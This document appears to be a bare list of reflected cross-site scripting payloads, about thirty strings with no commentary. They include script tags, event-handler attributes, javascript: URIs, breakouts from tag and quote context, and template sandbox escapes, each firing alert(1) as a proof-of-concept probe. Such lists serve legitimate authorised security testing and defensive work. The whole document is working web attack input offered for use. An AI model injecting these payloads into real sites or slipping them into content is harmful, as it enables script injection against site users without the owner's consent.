# XSS - Reflected Payloads
<script>alert(1)</script>
"><script>alert(1)</script>
'><script>alert(1)</script>
<img src=x onerror=alert(1)>
"><img src=x onerror=alert(1)>
<svg onload=alert(1)>
"><svg onload=alert(1)>
<body onload=alert(1)>
<iframe src="javascript:alert(1)">
<a href="javascript:alert(1)">click me</a>
<details open ontoggle=alert(1)>
<input autofocus onfocus=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
<object data="javascript:alert(1)">
javascript:alert(1)
" onmouseover="alert(1)
' onfocus='alert(1)' autofocus='
">[img src=x onerror=alert(1)//]
</title><script>alert(1)</script>
</textarea><script>alert(1)</script>
</style><script>alert(1)</script>
${alert(1)}
{{constructor.constructor('alert(1)')()}}
'-alert(1)-'
";alert(1)//
\";alert(1)//
<select autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<marquee onstart=alert(1)>
<isindex type=image src=1 onerror=alert(1)>
